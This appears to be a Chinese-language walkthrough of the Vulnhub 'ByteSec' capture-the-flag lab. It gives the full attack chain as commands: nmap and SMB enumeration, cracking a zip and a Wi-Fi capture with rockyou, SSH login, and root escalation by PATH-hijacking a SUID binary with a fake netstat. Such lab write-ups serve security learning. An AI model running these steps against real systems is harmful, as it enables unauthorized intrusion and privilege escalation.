bytesec靶场

靶场下载


https://www.vulnhub.com/entry/hacknos-os-bytesec,393/

下载完成后进入配置修改网卡

教程

配置

第一步:启动靶机时按下 shift 键,

  • 进入以下界面

bytesec靶场_第1张图片

第二步:选择第二个选项,然后按下 e 键,进入编辑界面

bytesec靶场_第2张图片

将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令

bytesec靶场_第3张图片

ip a 查看一下实际用的网卡,这里是ens33

bytesec靶场_第4张图片

vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,如果不一致,则将这两个都改成 ens33

  • 按下 i 即可进入编辑模式

bytesec靶场_第5张图片

/etc/init.d/networking restart 重启网卡服务

一、发现主机

工具nmap及netdiscover

nmap -sP 192.168.16.0/24

or

netdiscover -i eth0 -r 192.168.16.0/24

bytesec靶场_第6张图片

登录验证:

bytesec靶场_第7张图片

获取详细信息

nmap -sV -sC -A  192.168.16.175  

可知版本号,常见开放端口等

bytesec靶场_第8张图片

二、扫描目录

工具gobuster

gobuster  dir -u http://192.168.16.175    -w /usr/share/wordlists/dirbuster/directory-list-2.3-sma

bytesec靶场_第9张图片

工具 dirsearch

dirsearch -u http://192.168.16.175/

bytesec靶场_第10张图片

访问扫描到的目录,发现基本都是图片,没有什么可以利用的信息

三、 smb服务漏洞

刚刚扫描中有发现smb服务,

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

文件共享服务(SMB)解释:

通过网络提供文件共享服务,提供文件下载和上传服务(类似于FTP服务器)

工具 smbmap

SMBMap允许用户枚举整个域中的samba共享驱动器。用户可以使用该工具列出共享驱动器、驱动器权限、共享内容、上传/下载功能、文件名自动下载模式匹配,甚至远程执行命令。该工具原本的设计初衷是为了简化在大型网络中搜索潜在敏感数据的过程。

smbmap -H 192.168.16.175 

这里显示没有权限:NO ACCESS

bytesec靶场_第11张图片

工具enum4linux

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。

enum4linux 192.168.16.175

bytesec靶场_第12张图片

显示用户名保存下

image-20230815114754857

尝试登录

smbmap -H 192.168.16.175 -u 用户名

使用 smb用户发现是可读的,应该是没有密码

bytesec靶场_第13张图片

工具smbclinet

smbclient是客户端软件,是测试与Windows共享连接的有用工具。它可用于传输文件或查看共享名。

直接连接:

smbclient//192.168.16.175 -U smb 

报错:

bytesec靶场_第14张图片

这里猜测是隐藏文件

访问

smbclient //192.168.16.175/smb  -U smb

成功连接并可以执行命令

bytesec靶场_第15张图片

发现一个main.txt文件和一个safe.zip压缩文件,直接查看失败

下载到本地进行查看

get main.txt

get safe.zip

bytesec靶场_第16张图片

main.txt中没有东西,safe.zip中有密码

解密 工具:fcrackzip 破解压缩文件

Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。

部分重要参数说明

-b 表示使用暴利破解的方式
-c 'aA1' 表示使用大小写字母和数字混合破解的方式
-l 1-10 表示需要破解的密码长度为1到10位
-u 表示只显示破解出来的密码,其他错误的密码不显示出
-D 表示要使用字典破解
-p 表示要使用那个字典破解

注:Kali linux自带了一些字典在/usr/share/wordlists/文件夹下。

这里使用的字典为rockyou.txt需要在kali中解压后使用

gzip -d /usr/share/wordlists/rockyou.txt.gz

语法:

fcrackzip  -D -p /usr/share/wordlists/rockyou.txt  -u  safe.zip 

bytesec靶场_第17张图片

解压后,里面一个图片和一个cap文件,使用wireshark打开,但是没有发现什么可用信息。

图片查看:exiftool secret.jpg

bytesec靶场_第18张图片

bytesec靶场_第19张图片

工具aircrack-ng 猜测数据包

Aircrack-ng是一款用于无线网络渗透测试的工具,它可以扫描无线网络、捕获数据包、破解密码等。

流量包中可能存在密码使用工具猜解密码

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

密码可能是 snowflake,账号在刚刚得到的三个中进行尝试

bytesec靶场_第20张图片

ssh远程登陆

ssh     [email protected] -p 2525

输入密码:snowflake登录成功,更改为bash模式

bytesec靶场_第21张图片

查看当前存在的用户

cat /etc/passwd

bytesec靶场_第22张图片

返回得到第一个flag

bytesec靶场_第23张图片

四、劫持命令提权

1.查找出具有suid权限的文件

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了

已知的可用来提权的linux可行性的文件列表如下:
nmap
vim
find
bash
more
less
nano
cp

查找语句

find / -perm -u=s -type f 2>/dev/null

bytesec靶场_第24张图片

发现netscan命令

2.分析netscan文件

查看

netstat -anpt

netscan
两条命令,执行结果基本一致

bytesec靶场_第25张图片

xxd命令可以为给定的标准输入或者文件做一次十六进制的输出

这里使用xxd是因为文件是C编译的

xxd /usr/bin/netscan | less

可以看到该文件这边是调用了netstat -anpt命令

bytesec靶场_第26张图片

确认该文件为root权限

bytesec靶场_第27张图片

3.添加劫持

cd /tmp/
这里要先切换到临时目录
echo "/bin/sh" >netstat

#在临时目录创建一个文件调用netstat这个命令 
chmod 777 netstat
export PATH=/tmp:$PATH   

#意思是可执行文件的路径包括原先设定的路径,也包括从“路径1”到“路径n”的所有路径。

bytesec靶场_第28张图片

最后执行netscan,提权成功

bytesec靶场_第29张图片

查看获取flag

# cd /home/blackjax
# ls
user.txt
# cat user.txt

bytesec靶场_第30张图片

你可能感兴趣的:(Web安,网络安全学习,安全,web安全)